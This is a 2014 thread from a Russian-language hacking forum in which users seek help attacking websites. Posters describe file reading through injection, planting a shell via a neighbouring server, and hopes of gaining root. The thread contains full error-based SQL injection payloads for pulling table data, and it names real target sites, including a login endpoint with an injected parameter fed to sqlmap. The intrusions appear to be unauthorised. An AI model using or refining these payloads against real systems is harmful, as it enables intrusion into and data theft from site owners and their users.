ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.03.2014, 01:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
15532
Репутация:
4
|
|
Пробовал. СУБД локально доступна только через инъекцию (прав на запись нет), удаленно - не настроен сервис в принципе. FTP отгорожен полностью через hosts.deny, ssh доступен лишь для нескольких айпи адресов через hosts.allow/deny. Каких-либо уязвимостей на исполнение кода в коде сайта найти не удалось. Наружу смотрят лишь Postfix, Dovecot, Apache и Webmin. На руках лишь чтение общих файлов системы через php и select инъекция для mysql.
Самое обидное то, что в отличие от другого сайта, где у меня есть шелл, но нет возможности поднять привилегии, этот сайт, судя по версии ядра, очень хорошо рутается.
|
|
|
|
27.03.2014, 22:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от Rextor
Rextor said:
Пробовал. СУБД локально доступна только через инъекцию (прав на запись нет), удаленно - не настроен сервис в принципе. FTP отгорожен полностью через hosts.deny, ssh доступен лишь для нескольких айпи адресов через hosts.allow/deny. Каких-либо уязвимостей на исполнение кода в коде сайта найти не удалось. Наружу смотрят лишь Postfix, Dovecot, Apache и Webmin. На руках лишь чтение общих файлов системы через php и select инъекция для mysql.
Самое обидное то, что в отличие от другого сайта, где у меня есть шелл, но нет возможности поднять привилегии, этот сайт, судя по версии ядра, очень хорошо рутается.
Попробуйте залиться через соседей, прочтя конфиг через local load infile в мускуле.
|
|
|
|
27.03.2014, 22:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
15532
Репутация:
4
|
|
Аналогично, пробовал Изначально у меня был один сайт, про который я и писал сейчас. Через конфиги узнал, что у него есть "зеркало" на отдельном сервере (тестовая версия), на котором еще было много соседних сайтов, один из которых был уязвим, что позволило залить шелл на второй сервер и сделать копию интересуемого сайта для более полного анализа. К сожалению, новых уязвимостей на первом сайте/сервере найти все равно не удалось.
|
|
|
|
28.03.2014, 12:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
6813
Репутация:
0
|
|
Привет хацкеры)Учусь sql-inj,но не могу найти ответа в гугле)
Для проверки сайта на скули обязательно урл вида
Сообщение от None
index1.php?id=1 или user=1
,т.е обязательно урл должен заканчиваться на значение параметра?
Просто на данном сайте
Сообщение от None
http://onecapper.ru
всё переименовано,для красоты или же в целях безопасности)
Если возможно поподробнее) |
|
|
|
28.03.2014, 12:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
343026
Репутация:
391
|
|
CoolHucker
инъекция может быть где угодно POST\ GET и в кукисах, заголовках.
|
|
|
|
28.03.2014, 12:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от CoolHucker
CoolHucker said:
Привет хацкеры)Учусь sql-inj,но не могу найти ответа в гугле)
Для проверки сайта на скули обязательно урл вида ,т.е обязательно урл должен заканчиваться на значение параметра?
Просто на данном сайте всё переименовано,для красоты или же в целях безопасности)
Если возможно поподробнее)
https://forum.antichat.net/thread50572.html
|
|
|
|
28.03.2014, 13:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
6813
Репутация:
0
|
|
Спс керберус)где почитать не подскажешь? Просто там страницы типа,а в мануалах значения =1 =4 и тд)
Сообщение от None
http://onecapper.ru/garantii-n
http://onecapper.ru/prays-list
Как проверить на скули?Web-Cruiser-lol
P.S Плюхи раздал |
|
|
|
29.03.2014, 03:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
5993
Репутация:
0
|
|
Знатоки!! Помогите раскрутить одну SQL.
URL привести не могу, вот полный SQL запрос:
Код:
Code:
SELECT DISTINCT sc.id,sc.published,sc.template,sc.pagetitle FROM table sc LEFT JOIN table2
dg on dg.document = sc.id WHERE sc.id IN (1,2,3) AND sc.published=1 AND sc.deleted=0 AND (sc.privateweb=0) GROUP BY sc.id ORDER BY sc.pagetitle [SQL_HERE]
Там где [SQL_HERE], соответственно имеем иньект. На его место я вставляю:
Код:
Code:
(1)OR(SELECT(1)FROM(SELECT COUNT(0),CONCAT((SELECT(CONCAT_WS(VERSION(),(SELECT VERSION())))),FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA.TABLES) GROUP BY 2)A)
И на первый взгляд всё работает, выдаётся Duplicate entry '5.4.32' for key 'group_key'
Но как только я пытаюсь вывести информацию из любой таблицы, к примеру таким SQL запросом:
Код:
Code:
SELECT DISTINCT sc.id,sc.published,sc.template,sc.pagetitle FROM table sc LEFT JOIN table2
dg on dg.document = sc.id WHERE sc.id IN (1,2,3) AND sc.published=1 AND sc.deleted=0 AND (sc.privateweb=0) GROUP BY sc.id ORDER BY sc.pagetitle
(1)OR(SELECT(1)FROM(SELECT COUNT(0),CONCAT((SELECT(CONCAT_WS(VERSION(),(SELECT COUNT(*) from table)))),FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA.TABLES) GROUP BY 2)A)
Я получаю неизвестную для меня ошибку: Table 'table' doesn't exist
И как бы я не крутил SQL, от неё избавиться никак не могу.
Буду благодарен если кто подскажет как правильно составить SQL запрос в моем случае, чтобы выудить произвольную информацию из доступных таблиц.
Спасибо. |
|
|
|
29.03.2014, 05:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Сообщение от Сбербанк
Сбербанк said:
Знатоки!! Помогите раскрутить одну SQL.
URL привести не могу, вот полный SQL запрос:
Код:
Code:
SELECT DISTINCT sc.id,sc.published,sc.template,sc.pagetitle FROM table sc LEFT JOIN table2
dg on dg.document = sc.id WHERE sc.id IN (1,2,3) AND sc.published=1 AND sc.deleted=0 AND (sc.privateweb=0) GROUP BY sc.id ORDER BY sc.pagetitle [SQL_HERE]
Там где [SQL_HERE], соответственно имеем иньект. На его место я вставляю:
Код:
Code:
(1)OR(SELECT(1)FROM(SELECT COUNT(0),CONCAT((SELECT(CONCAT_WS(VERSION(),(SELECT VERSION())))),FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA.TABLES) GROUP BY 2)A)
И на первый взгляд всё работает, выдаётся Duplicate entry '5.4.32' for key 'group_key'
Но как только я пытаюсь вывести информацию из любой таблицы, к примеру таким SQL запросом:
Код:
Code:
SELECT DISTINCT sc.id,sc.published,sc.template,sc.pagetitle FROM table sc LEFT JOIN table2
dg on dg.document = sc.id WHERE sc.id IN (1,2,3) AND sc.published=1 AND sc.deleted=0 AND (sc.privateweb=0) GROUP BY sc.id ORDER BY sc.pagetitle
(1)OR(SELECT(1)FROM(SELECT COUNT(0),CONCAT((SELECT(CONCAT_WS(VERSION(),(SELECT COUNT(*) from table)))),FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA.TABLES) GROUP BY 2)A)
Я получаю неизвестную для меня ошибку: Table 'table' doesn't exist
И как бы я не крутил SQL, от неё избавиться никак не могу.
Буду благодарен если кто подскажет как правильно составить SQL запрос в моем случае, чтобы выудить произвольную информацию из доступных таблиц.
Спасибо. Table 'table' doesn't exist - может быть нет такой таблицы?
|
|
|
|
30.03.2014, 16:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
10188
Репутация:
0
|
|
ребята подскажите в чем проблема и как ее исправить, какие опции лучше поставить в sqlmap, сканер показал что есть слепые, причем многочисленные, но когда начинаю работать sqlmap,ом выдает после работы ошибку [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 253 times, 500 (Internal Server Error) - 105 times
линк
https://login01.stockholm.se/siteminderagent/formsja/DynamicRetry.fcc
POST
SMENC=SHIFT_JIS&SMLOCALE=JP-jp&USER=&PASSWORD=&target=&smauthreason=&smagentna me=%27+and+%27f%27%3D%27f%27+--+&postpreservationdata=
помогите люди советом и подсказкой
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
